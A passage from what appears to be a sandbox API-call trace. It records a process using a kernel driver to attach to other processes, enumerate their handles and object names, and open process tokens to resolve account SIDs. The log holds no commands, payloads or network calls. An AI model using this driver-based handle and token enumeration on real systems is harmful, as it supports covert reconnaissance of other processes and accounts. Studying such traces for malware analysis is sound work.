Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034c7670, HandleInformation=0x0) returned 0x0 [0245.781] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.781] PsReleaseProcessExitSynchronization () returned 0x2 [0245.781] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0245.781] ObQueryNameString (in: Object=0xfffffa80034c7670, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.781] ObfDereferenceObject (Object=0xfffffa80034c7670) returned 0xb [0245.781] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.781] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.781] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.781] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0245.781] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.781] PsAcquireProcessExitSynchronization () returned 0x0 [0245.781] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0) [0245.781] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001232300, HandleInformation=0x0) returned 0x0 [0245.781] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.781] PsReleaseProcessExitSynchronization () returned 0x2 [0245.781] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0245.781] ObQueryNameString (in: Object=0xfffff8a001232300, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.781] ObfDereferenceObject (Object=0xfffff8a001232300) returned 0x2 [0245.781] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.782] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.782] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.782] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0245.782] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.782] PsAcquireProcessExitSynchronization () returned 0x0 [0245.782] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0) [0245.782] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034c35f0, HandleInformation=0x0) returned 0x0 [0245.782] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.782] PsReleaseProcessExitSynchronization () returned 0x2 [0245.782] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0245.782] ObQueryNameString (in: Object=0xfffffa80034c35f0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.782] ObfDereferenceObject (Object=0xfffffa80034c35f0) returned 0x1 [0245.782] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.782] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.782] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.782] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0245.782] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.782] PsAcquireProcessExitSynchronization () returned 0x0 [0245.782] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880053c85d0) [0245.782] ObReferenceObjectByHandle (in: Handle=0x238, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034c3980, HandleInformation=0x0) returned 0x0 [0245.782] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.782] PsReleaseProcessExitSynchronization () returned 0x2 [0245.782] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x87 [0245.782] ObQueryNameString (in: Object=0xfffffa80034c3980, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.782] ObfDereferenceObject (Object=0xfffffa80034c3980) returned 0x11 [0245.782] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.783] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x588) returned 0xc8 [0245.783] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.783] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80036a4060, HandleInformation=0x0) returned 0x0 [0245.783] ObOpenObjectByPointer (in: Object=0xfffffa80036a4060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.783] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x37 [0245.783] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e7fa80 | out: TokenHandle=0xfffffa8001e7fa80*=0xc4) returned 0x0 [0245.783] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.783] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.783] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.783] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.785] CloseHandle (hObject=0xc4) returned 1 [0245.785] CloseHandle (hObject=0xc8) returned 1 [0245.785] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.785] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0245.785] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.785] PsAcquireProcessExitSynchronization () returned 0x0 [0245.785] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880053c85d0) [0245.785] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037e9070, HandleInformation=0x0) returned 0x0 [0245.785] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.785] PsReleaseProcessExitSynchronization () returned 0x2 [0245.785] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x35 [0245.785] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.785] ObfDereferenceObject (Object=0xfffffa80037e9070) returned 0x1 [0245.785] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.785] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.786] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.786] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.786] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.786] PsAcquireProcessExitSynchronization () returned 0x0 [0245.786] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880053c85d0) [0245.786] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003825130, HandleInformation=0x0) returned 0x0 [0245.786] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.786] PsReleaseProcessExitSynchronization () returned 0x2 [0245.786] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x35 [0245.786] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.786] ObfDereferenceObject (Object=0xfffffa8003825130) returned 0x1 [0245.786] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.786] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.786] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.786] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.786] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.786] PsAcquireProcessExitSynchronization () returned 0x0 [0245.786] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880053c85d0) [0245.786] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.786] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.786] PsReleaseProcessExitSynchronization () returned 0x2 [0245.786] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x35 [0245.786] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.786] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.786] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.787] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.787] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.787] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.787] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.787] PsAcquireProcessExitSynchronization () returned 0x0 [0245.787] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880053c85d0) [0245.787] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.787] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.787] PsReleaseProcessExitSynchronization () returned 0x2 [0245.787] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x35 [0245.787] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.787] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.787] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.787] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xc8 [0245.787] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.787] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001e8a630, HandleInformation=0x0) returned 0x0 [0245.787] ObOpenObjectByPointer (in: Object=0xfffffa8001e8a630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.787] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x14 [0245.787] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e7fa80 | out: TokenHandle=0xfffffa8001e7fa80*=0xc4) returned 0x0 [0245.787] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.787] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.787] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.788] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.789] CloseHandle (hObject=0xc4) returned 1 [0245.789] CloseHandle (hObject=0xc8) returned 1 [0245.789] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.789] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.789] PsLookupProcessByProcessId (in: ProcessId=0x6fc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.790] PsAcquireProcessExitSynchronization () returned 0x0 [0245.790] KeStackAttachProcess (in: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880053c85d0) [0245.790] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001eb7830, HandleInformation=0x0) returned 0x0 [0245.790] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.790] PsReleaseProcessExitSynchronization () returned 0x2 [0245.790] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x12 [0245.790] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.790] ObfDereferenceObject (Object=0xfffffa8001eb7830) returned 0x1 [0245.790] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.790] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.790] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.790] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0245.790] PsLookupProcessByProcessId (in: ProcessId=0x6fc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.790] PsAcquireProcessExitSynchronization () returned 0x0 [0245.790] KeStackAttachProcess (in: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880053c85d0) [0245.790] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e9e2b0, HandleInformation=0x0) returned 0x0 [0245.790] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.790] PsReleaseProcessExitSynchronization () returned 0x2 [0245.790] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x12 [0245.790] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.790] ObfDereferenceObject (Object=0xfffffa8001e9e2b0) returned 0x1 [0245.790] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.790] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.791] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.791] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.791] PsLookupProcessByProcessId (in: ProcessId=0x6fc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.791] PsAcquireProcessExitSynchronization () returned 0x0 [0245.791] KeStackAttachProcess (in: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880053c85d0) [0245.791] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.791] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.791] PsReleaseProcessExitSynchronization () returned 0x2 [0245.791] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x12 [0245.791] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.791] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.791] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.791] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xc8 [0245.791] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.791] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001fccb30, HandleInformation=0x0) returned 0x0 [0245.791] ObOpenObjectByPointer (in: Object=0xfffffa8001fccb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.791] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x14 [0245.791] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e7fa80 | out: TokenHandle=0xfffffa8001e7fa80*=0xc4) returned 0x0 [0245.792] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.792] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.792] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.792] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.794] CloseHandle (hObject=0xc4) returned 1 [0245.794] CloseHandle (hObject=0xc8) returned 1 [0245.794] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.794] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.794] PsLookupProcessByProcessId (in: ProcessId=0xc4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.794] PsAcquireProcessExitSynchronization () returned 0x0 [0245.794] KeStackAttachProcess (in: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880053c85d0) [0245.794] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fc9c50, HandleInformation=0x0) returned 0x0 [0245.794] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.794] PsReleaseProcessExitSynchronization () returned 0x2 [0245.794] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x12 [0245.794] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 